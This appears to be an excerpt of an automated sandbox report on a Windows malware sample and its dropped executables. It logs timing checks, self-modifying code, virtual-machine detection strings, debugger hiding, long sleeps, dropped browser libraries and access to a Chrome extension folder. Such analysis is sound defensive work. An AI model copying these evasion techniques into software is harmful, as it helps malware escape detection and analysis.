                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBF21 second address: 9BBF27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBF27 second address: 9BBF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BC11C second address: 9BC120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51306FE second address: 513076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F2EE4767546h 0x0000000a mov bx, cx 0x0000000d pop eax 0x0000000e popad 0x0000000f xor dword ptr [esp], 17B9D274h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2EE4767543h 0x0000001d sub eax, 4EA5A2CEh 0x00000023 jmp 00007F2EE4767549h 0x00000028 popfd 0x00000029 mov ax, B4D7h 0x0000002d popad 0x0000002e mov eax, dword ptr fs:[00000000h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513076B second address: 5130771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130771 second address: 5130777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130777 second address: 513077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513077B second address: 513077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513077F second address: 513078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513078E second address: 5130792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130792 second address: 5130796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130796 second address: 513079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513079C second address: 51307A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51307A2 second address: 51307D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e mov edi, ecx 0x00000010 pop ecx 0x00000011 mov cx, dx 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007F2EE476753Bh 0x0000001b sub esp, 1Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51307D9 second address: 51307DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51307DD second address: 51307E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 80E9F0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 80EAD9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9D5E0C instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9C0CF5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A3BF88 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 51E9F0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 51EAD9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 6E5E0C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 6D0CF5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 74BF88 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSpecial instruction interceptor: First address: 3CEA7C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSpecial instruction interceptor: First address: 56D4D9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSpecial instruction interceptor: First address: 5FBEE1 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSpecial instruction interceptor: First address: 8FDA37 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeSpecial instruction interceptor: First address: B2A3F1 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSpecial instruction interceptor: First address: 67DCF9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSpecial instruction interceptor: First address: 67DDD8 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSpecial instruction interceptor: First address: 82B63F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSpecial instruction interceptor: First address: 829DFD instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSpecial instruction interceptor: First address: 83BD63 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSpecial instruction interceptor: First address: 10DCF9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSpecial instruction interceptor: First address: 10DDD8 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSpecial instruction interceptor: First address: 2BB63F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSpecial instruction interceptor: First address: 2B9DFD instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeSpecial instruction interceptor: First address: 2CBD63 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeSpecial instruction interceptor: First address: 682CC6 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeMemory allocated: 4C60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeMemory allocated: 78B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeMemory allocated: 198B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2A20000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4BB0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeMemory allocated: 5320000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeMemory allocated: 5380000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeMemory allocated: 7380000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeMemory allocated: 47D0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeMemory allocated: 4B30000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeMemory allocated: 4950000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05180DC1 rdtsc 0_2_05180DC1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeWindow / User API: threadDelayed 1155Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeWindow / User API: threadDelayed 2982Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5899Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3915Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DiagTrack.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\ProgramData\chrome.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3844Thread sleep count: 31 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3844Thread sleep time: -62031s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2736Thread sleep count: 322 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2736Thread sleep time: -9660000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3620Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3264Thread sleep count: 51 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3264Thread sleep time: -102051s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2736Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 1852Thread sleep count: 1155 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 1852Thread sleep count: 2982 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99765s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99656s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99547s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99422s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99312s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99203s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -99093s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98984s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98765s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98655s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98547s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98422s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98312s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98203s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -98093s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe TID: 2140Thread sleep time: -97983s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe TID: 3624Thread sleep time: -32016s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe TID: 3084Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe TID: 3736Thread sleep time: -32016s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe TID: 3616Thread sleep time: -30015s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5356Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe TID: 7356Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99765Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99656Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99547Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99422Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99312Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99203Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 99093Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98984Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98765Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98655Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98547Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98422Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98312Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98203Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 98093Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeThread delayed: delay time: 97983Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: skotes.exe, skotes.exe, 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmp, 0d8313073f.exe, 0000000D.00000002.2928434027.0000000000A7F000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.00000000015BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareG
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc_
                          Source: Fwkdsz.exe, 00000007.00000002.2636511442.0000000001093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: wscript.exe, 0000000E.00000003.2599747839.00000289EE0A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ED
                          Source: firefox.exe, 00000020.00000002.2959187784.00000253DE338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh43
                          Source: firefox.exe, 00000020.00000002.2959187784.00000253DE2E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                          Source: Fwkdsz.exe, 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                          Source: skotes.exe, 00000006.00000002.2934737174.0000000001578000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001171000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001140000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.00000000015BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Fwkdsz.exe, 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                          Source: file.exe, 00000000.00000002.1704179638.0000000000992000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1734127491.00000000006A2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1736207087.00000000006A2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmp, 0d8313073f.exe, 0000000D.00000002.2928434027.0000000000A7F000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: file.exe, 00000000.00000003.1678864647.0000000001296000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\=F
                          Source: Fwkdsz.exe, 00000007.00000002.2636511442.0000000001093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`]c
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05180B75 Start: 05180BD1 End: 05180B920_2_05180B75
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: regmonclass
